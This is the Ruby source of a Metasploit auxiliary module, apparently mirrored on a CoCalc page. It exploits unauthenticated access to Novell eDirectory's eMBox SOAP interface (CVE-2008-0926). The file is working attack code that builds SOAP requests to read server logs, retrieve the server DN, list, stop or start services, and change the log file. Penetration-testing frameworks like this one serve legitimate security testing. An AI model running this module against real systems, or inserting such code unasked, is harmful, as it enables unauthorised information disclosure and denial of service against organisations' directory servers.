CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Exploit::Remote::HttpClient

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Novell eDirectory eMBox Unauthenticated File Access',

13
      'Description'    => %q{

14
          This module will access Novell eDirectory's eMBox service and can run the

15
        following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,

16
        STOP_SERVICE, START_SERVICE, SET_LOGFILE.

17
      },

18
      'References'     =>

19
        [

20
          [ 'CVE', '2008-0926' ],

21
          [ 'BID', '28441' ],

22
          [ 'OSVDB', '43690' ]

23
        ],

24
      'Author'         =>

25
        [

26
          'Nicob',

27
          'MC',    #Initial Metasploit module

28
          'sinn3r'

29
        ],

30
      'License'        => MSF_LICENSE,

31
      'Actions'        =>

32
        [

33
          [

34
            'GET_DN',

35
            {

36
              'Description' => 'Get DN',

37
              'CMD'         => 'novell.embox.connmgr.serverinfo',

38
              'PATTERN'     => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,

39
              'USE_PARAM'   => false

40
            }

41
          ],

42
          [

43
            'READ_LOGS',

44
            {

45
              'Description' => 'Read all the log files',

46
              'CMD'         => 'logger.readlog',

47
              'PATTERN'     => /<LogFileData>(.*)<\/LogFileData>/,

48
              'USE_PARAM'   => false

49
            }

50
          ],

51
          [

52
            'LIST_SERVICES',

53
            {

54
              'Description' => 'List services',

55
              'CMD'         => 'novell.embox.service.getServiceList',

56
              'PATTERN'     => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,

57
              'USE_PARAM'   => false

58
            }

59
          ],

60
          [

61
            'STOP_SERVICE',

62
            {

63
              'Description' => 'Stop a service',

64
              'CMD'         => 'novell.embox.service.stopService',

65
              'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,

66
              'PARAM'       => '<Parameters><params xmlns:DSService="service.dtd">'+

67
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>'+

68
                               '</params></Parameters>',

69
              'USE_PARAM'   => true

70
            }

71
          ],

72
          [

73
            'START_SERVICE',

74
            {

75
              'Description' => 'Start a service',

76
              'CMD'         => 'novell.embox.service.startService',

77
              'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,

78
              'PARAM'       => '<Parameters>' +

79
                               '<params xmlns:DSService="service.dtd">' +

80
                               '<DSService:moduleName>__PARAM__</DSService:moduleName>'+

81
                               '</params></Parameters>',

82
              'USE_PARAM'   => true

83
            }

84
          ],

85
          [

86
            'SET_LOGFILE',

87
            {

88
              'Description' => 'Read Log File',

89
              'CMD'         => 'logger.setloginfo',

90
              'PATTERN'     => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,

91
              'PARAM'       => '<Parameters><params><logFile>__PARAM__</logFile>'+

92
                               '<logOptionAppend/></params></Parameters>',

93
              'USE_PARAM'   => true

94
            }

95
          ]

96
        ],

97
      'DefaultAction'  => 'LIST_SERVICES'

98
    ))

99


100
    register_options(

101
      [

102
        Opt::RPORT(8028),

103
        OptString.new("PARAM", [false, 'Specify a parameter for the action'])

104
      ])

105
  end

106


107
  def run

108


109
    if action.opts['USE_PARAM']

110
      if datastore['PARAM'].nil? or datastore['PARAM'].empty?

111
        print_error("You must supply a parameter for action: #{action.name}")

112
        return

113
      else

114
        param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])

115
      end

116
    else

117
      param = '<Parameters><params/></Parameters>'

118
    end

119


120
    template = %Q|<?xml version="1.0"?>

121
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">

122
    <SOAP-ENV:Header/>

123
    <SOAP-ENV:Body>

124
    <dispatch>

125
    <Action>#{action.opts['CMD']}</Action>

126
    <Object/>#{param}</dispatch>

127
    </SOAP-ENV:Body>

128
    </SOAP-ENV:Envelope>|

129


130
    template = template.gsub(/^ {4}/, '')

131
    template = template.gsub(/\n/, '')

132


133
    connect

134
    print_status("Sending command: #{action.name}...")

135
    res = send_request_cgi({

136
      'method'   => 'POST',

137
      'uri'      => '/SOAP',

138
      'data'     => template + "\n\n",

139
      'headers'  =>

140
        {

141
          'Content-Type' => 'text/xml',

142
          'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",

143
        }

144
    }, 25)

145


146
    if res.nil?

147
      print_error("Did not get a response from server")

148
      return

149
    end

150


151
    raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]

152
    print_line("\n" + Rex::Text.decode_base64(raw_data))

153


154
    disconnect

155
  end

156
end

157


158